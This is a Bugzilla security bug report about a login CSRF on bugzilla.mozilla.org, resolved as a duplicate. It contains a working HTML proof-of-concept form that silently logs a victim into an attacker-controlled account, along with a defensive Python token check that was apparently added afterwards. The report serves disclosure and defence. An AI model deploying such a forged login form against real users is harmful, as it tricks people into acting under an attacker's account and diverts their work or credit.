Switching a user to another account

RESOLVED DUPLICATE of bug 713926

Bugzilla
User Accounts
4 years ago
4 years ago

People

(Reporter: Dawid Czagan, Unassigned)

Tracking

(Blocks: 1 bug)

unspecified
Bug Flags:
sec-bounty -

Details

(Whiteboard: [site:bugzilla.mozilla.org][reporter-external])

Description (Reporter, 4 years ago)
User Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; McAfee; MAARJS)

Steps to reproduce:

It is possible to log the user in to another account (CSRF attack). Steps to reproduce: the user logs in to his account and then the following actions are performed:
1. Enter http://bugzilla.mozilla.org/index.cgi?logout=1 to log out the user.
2. Then log the user in to another account. PoC (for demonstration purposes with a Submit button; normally sent automatically):

<html>
  <body>
    <form action="https://bugzilla.mozilla.org/index.cgi" method="POST">
      <input type="hidden" name="Bugzilla&#95;login" value="E-MAIL_ATTACKER" />
      <input type="hidden" name="Bugzilla&#95;password" value="PASSWORD_ATTACKER" />
      <input type="hidden" name="GoAheadAndLogIn" value="Log&#32;in" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

It is assumed that E-MAIL_ATTACKER with PASSWORD_ATTACKER exists.

There might be different reasons for the attacker to launch this attack. An exemplary one is getting credit/a bounty for a submitted bug (the attacker logs the user into his account; the user thinks that he is using his own account and submits a bug; the action is done from the attacker's account and the credit/bounty goes to the attacker).

Regards,
Dawid Czagan
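A defender-side check for the login CSRF described in the report, added here as an example and not Bugzilla's own code: when the site renders its own login form it sets a random nonce cookie and embeds an HMAC of that nonce as a hidden field, and the login handler rejects any POST whose field does not match the submitting browser's cookie. A form hosted on a third-party page, like the PoC above, can neither read the nonce nor compute the HMAC. The secret, cookie name and field name are assumptions.

```python
import hashlib
import hmac
import secrets

# Assumption: in a real deployment this secret is loaded from server config.
SERVER_SECRET = b"constructed-demo-secret"

COOKIE_NAME = "login_nonce"  # assumed cookie name
FIELD_NAME = "login_token"   # assumed hidden-field name in the login form


def issue_pre_login_token():
    """Called when the site renders its own login form.

    Returns (cookie_value, field_value): a random nonce to set as a cookie
    and an HMAC over that nonce to embed as a hidden form field."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, nonce.encode(), hashlib.sha256).hexdigest()
    return nonce, mac


def verify_login_request(cookie_nonce, field_token):
    """True only if the submitted field is the HMAC of this browser's nonce cookie."""
    if not cookie_nonce or not field_token:
        return False  # no cookie (form was not served by us) or field missing
    expected = hmac.new(SERVER_SECRET, cookie_nonce.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected.encode(), field_token.encode())


def handle_login(cookies, form):
    """Mimics index.cgi login handling for the fields named in the report,
    with the token check applied before any credential is looked at."""
    if form.get("GoAheadAndLogIn") != "Log in":
        return "no-op"
    if not verify_login_request(cookies.get(COOKIE_NAME), form.get(FIELD_NAME)):
        return "rejected: login token missing or does not match cookie"
    # Credential verification would follow here; omitted in this example.
    return "logged in as " + form.get("Bugzilla_login", "")


if __name__ == "__main__":
    nonce, token = issue_pre_login_token()
    creds = {"Bugzilla_login": "user@example.org", "Bugzilla_password": "x",
             "GoAheadAndLogIn": "Log in"}  # constructed sample input
    # A cross-site form carries only the credential fields: rejected.
    print(handle_login({COOKIE_NAME: nonce}, creds))
    # The site's own form also carries the matching token: accepted.
    print(handle_login({COOKIE_NAME: nonce}, dict(creds, **{FIELD_NAME: token})))
```

Pairing this with a SameSite attribute on the nonce cookie adds a second, browser-enforced barrier to cross-site POSTs.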
Flags: sec-bounty?
Whiteboard: [site:bugzilla.mozilla.org][reporter-external][verif?]
Status: UNCONFIRMED → RESOLVED
Last Resolved: 4 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 713926

Updated

4 years ago
Blocks: 835424
Flags: sec-bounty? → sec-bounty-
Whiteboard: [site:bugzilla.mozilla.org][reporter-external][verif?] → [site:bugzilla.mozilla.org][reporter-external]

Updated

4 years ago
Group: bugzilla-security